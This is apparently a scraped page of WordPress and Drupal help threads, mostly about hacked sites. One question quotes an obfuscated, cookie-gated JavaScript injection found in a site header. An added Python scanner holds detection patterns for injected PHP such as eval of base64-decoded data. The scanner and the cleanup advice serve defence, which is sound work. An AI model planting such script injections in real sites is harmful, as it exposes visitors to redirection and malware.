Strange $zend_framework codes in files (Wordpress, SMF) - wordpress

About a week ago, I found some strange code in all of my wordpress and SMF sites' files. The code is in every file which uses Wordpress' or SMF's API, even if it's not a default file of the specified system. It starts with a $zend_framework variable, and if I decode it with unphp.net, I get a strange obfuscated PHP class.
I asked my host whether it's a 'normal' error of the zend framework, but they said no, it's some weird code.
I searched Google for an answer and found some articles that say some hackers may use this method to hack a Wordpress website. I did not find any sign of unwanted logins to my website, but it sometimes does weird things. For example, one of my APIs (which uses Wordpress' API) stopped working properly at about the time this code appeared in the files. It worked before, but afterwards, for example, instead of the 'Bad request' message it returned an 'A#' message.
What is this code? Is it a bug of the zend framework, or is somebody trying to hack my website?
Here is the code decoded with UnPHP:
http://www.unphp.net/decode/c0958d9db747d5a32c8308ba2fcf4d27/

Someone isn't trying to hack your website, they've succeeded. This is a well known Wordpress exploit. It has nothing to do with Zend Framework (which Wordpress doesn't use). You need to restore your site from a safe backup, or start from a clean Wordpress install.
More info here: http://www.justbeck.com/zend_framework-wordpress-hacks/

Related

Wordpress site is very slow after being attacked by malware

I have been developing this website and we had to use the Gravity Form plugin.
There was a time when it became very vulnerable and the website was attacked (a massive crash occurred on the site). Ever since, the website has never been normal again. It is extremely slow to load, and sometimes there are 503 error messages. We have been monitoring the website securely, have updated wordpress and every plugin to the latest version, and have even deleted the ones without recent updates, but it seems that is not enough, because if you access the website now you will feel that it's extremely slow.
Is there anybody who has experienced this kind of attack? (especially if you were attacked via the Gravity Form plugin)
I would really appreciate your answer.
Scott
As Ed Cottrell mentioned you must rebuild your site.
Make a backup of files and database
Write down which plugins you use
Delete everything (leave only wp-content/uploads)
Install clean WP - it will be best if you use the same version you used
Install all the plugins - the data is still in the DB, so you won't have to configure them again
If you bought a theme - just download it again and install it. If someone made it for you - check it for some strange eval or some js files you don't know. When you are sure it's clean, put it back on the server.
When everything is done, change user passwords and ftp password.
Use https://wordpress.org/plugins/gotmls/ - it will help to find some nasty code.
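
A triage scan for the leads these threads give: the injected $zend_framework assignment from the first question, the "strange eval" the rebuild answer says to look for, and any PHP left under wp-content/uploads, the one directory the rebuild keeps. This is an added example, not code from any poster or from WordPress; the regexes, suffix list and sample tree are assumptions constructed from the descriptions on this page.

```python
import re
import sys
import tempfile
from pathlib import Path

# Assumed signatures, built from the descriptions on this page (not a malware feed).
SIGNATURES = {
    "zend_framework_marker": re.compile(rb"\$zend_framework\s*="),
    "eval_of_decoded_data": re.compile(
        rb"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
}
PHP_SUFFIXES = {".php", ".phtml", ".php5", ".inc"}

def scan_file(path, root):
    """Return the finding names for one PHP file under root."""
    rel = path.relative_to(root).as_posix()
    # uploads/ is kept during the rebuild, so PHP there is reported even if it looks benign.
    findings = ["php_in_uploads"] if rel.startswith("wp-content/uploads/") else []
    data = path.read_bytes()
    findings += [name for name, rx in SIGNATURES.items() if rx.search(data)]
    return findings

def scan_tree(root):
    """Map relative path -> findings for every flagged PHP file below root."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in PHP_SUFFIXES:
            findings = scan_file(path, root)
            if findings:
                report[path.relative_to(root).as_posix()] = findings
    return report

def demo():
    """Scan a small constructed tree; the file contents are made up for illustration."""
    samples = {
        "index.php": b'<?php $zend_framework="CONSTRUCTED"; ?><?php echo 1;',
        "wp-content/themes/t/functions.php": b"<?php eval(base64_decode($x));",
        "wp-content/uploads/2014/a.php": b"<?php echo 'hi';",
        "wp-includes/clean.php": b"<?php echo 'ok';",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in samples.items():
            (Path(tmp) / rel).parent.mkdir(parents=True, exist_ok=True)
            (Path(tmp) / rel).write_bytes(body)
        return scan_tree(tmp)

if __name__ == "__main__":
    for rel, found in (scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo()).items():
        print(f"{rel}: {', '.join(found)}")
```

A hit is a lead for manual review, and a clean result does not show the site is clean, since the patterns only cover what these threads describe.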

Retrieve theme from WordPress Store

Good morning,
I have a new client who has been working with an overseas developer and they seem to have simply disappeared. We have tried numerous times to contact them, and I am thinking it is possible something happened to them personally as the site they were working on for the client is still up - and they're nowhere to be found.
The goal was to continue the work they started, as it does seem somewhat extensive - rather than starting fresh. I understand this may sound ridiculous, and apologize for wasting everyone's time if this is simply impossible.
Premise: the site uses wordpress, with the woo-commerce plugin installed - both of which I've used in the past. I have a new wordpress blog and woo-commerce setup for the "new site".
I've been unable to successfully retrieve whatever custom CSS they've written for this, and have really only been able to retrieve the rendered code.
Underlying question: Does anyone have any suggestions for retrieving what has been done on this site, or somehow extracting the work as a theme? We have zero ability to log in to this site via FTP or via the wordpress login. My guess is that I'll have to start the project over from scratch, which naturally would be very disappointing to the client as I am trying to save them some money.
Site in question: http://olshop.filgap.com // http://olshop.filgap.com/shop

Get Directions change language

I'm working on a Wordpress site that uses the plugin Get Directions.
It works properly and gives me the directions in English, but I want to receive them in Dutch.
I've tried changing the URL from maps.google.com to alternatives like maps.google.nl and maps.google.com?language=nl-nl
Does anyone know how I can get the directions in Dutch? I have also asked on the official Wordpress forums but I don't know how long it usually takes for them to respond.
Seems impossible. The plugin uses the API URL http://www.mapquestapi.com/geocoding/. And checking the documentation, there is a locale parameter for the /directions Web Service, but nothing like this exists for the /geocoding Web Service, which is the one the plugin uses.
Note that the standard locale codes are in the format language_COUNTRY, e.g., nl_NL. I tried to modify the plugin code by adding &locale=nl_NL (and other languages), but it made no difference.

What is this? Google analytics cookie or malware?

I have a WordPress installation that has been targeted quite heavily by a phishing operation. I thought I had the security mostly covered except I found this in the header:
var a=document.cookie;document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=" "+document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="hip="+escape("hip")+";expires="+dt.toGMTString()+";path=/";document.write('</script>')};
That URL at the end is super suspicious. I googled but found no leads :-(
I haven't yet found the source of the code in my WP installation. It's not written into the template files or database. In the process of updating WP install now.
Does anyone have any knowledge of this?
That looks strange to me. Maybe try reinstalling wordpress and choose very complex passwords so nobody unauthorized can access your site. You might want to remove the google analytics code from the page and see if that makes a difference. Complex passwords include numbers, uppercase and lowercase letters, slashes and anything else you can think of. Make sure it is longer than 8 letters. If your site is infected, take it down from the web NOW until you're sure it's not.

Drupal: xmlsitemap file is not generated

I have chosen XMLSiteMap module from the most popular usage statistics on Drupal site,
so I assume the module is not too buggy. But the map file is absent.
I've installed this module on my Windows machine into drupal/sites/default/modules.
I've activated all the submodules of XMLSiteMap in admin menu.
Per docs, I've also run cron.php manually to create sitemap.xml in drupal/sites/default/files - but it's just not present there, even after a second re-install.
How can I force it to create sitemap.xml?
(also tried with and w/o clean URLs - still no help).
Also, is there any good, reliable alternative to this module?
Are you sure you've installed it properly? Please check the Status report (admin/logs/status in Drupal 5, admin/reports/status in Drupal 6) to ensure that you've got everything right.
It's possible that you haven't set the permissions of sites/default/files properly yet for example.
I'm not sure if this will help you, but if you are looking for an actual created sitemap.xml file rather than navigating to it in the browser I don't believe one is created by the module. I think the module creates a menu callback to create the sitemap file, so a request for sitemap.xml is handled by Drupal's menu system, rather than creating an actual file. There will however be a cached version in sites/default/files/xmlsitemap.
Apologies if this is an oversimplification of the question asked.
I have not had any problems with the reliability of the module myself.
Also make sure you have the latest version installed, it just came out yesterday:
http://drupal.org/project/xmlsitemap
Also, see this issue, seems related to your problem:
http://drupal.org/node/458546
I'd probably recommend trying the 6.x-2.x branch which I've been rewriting to kind of solve all the annoying bugs and architectural problems of the 6.x-1.x branch. It's currently incomplete, but it works for nodes and menu items currently. Taxonomy terms and user profiles will be added soon.
You can find the link to it on the project page. Sorry I can't link since I'm a new user. :)
Running the CRON worked for me:
/admin/reports/status/run-cron
